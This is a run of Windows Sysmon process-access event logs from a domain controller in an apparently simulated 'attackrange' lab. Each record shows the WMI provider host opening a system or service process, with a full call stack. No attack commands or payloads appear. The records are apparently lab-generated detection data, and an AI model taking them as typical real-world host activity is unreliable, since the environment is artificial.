16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030946Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030945Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030944Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030943Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030942Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030941Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.378{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030940Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030939Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030938Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030937Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030936Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030935Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030934Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030933Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030932Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030931Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030930Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030929Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030928Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030927Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 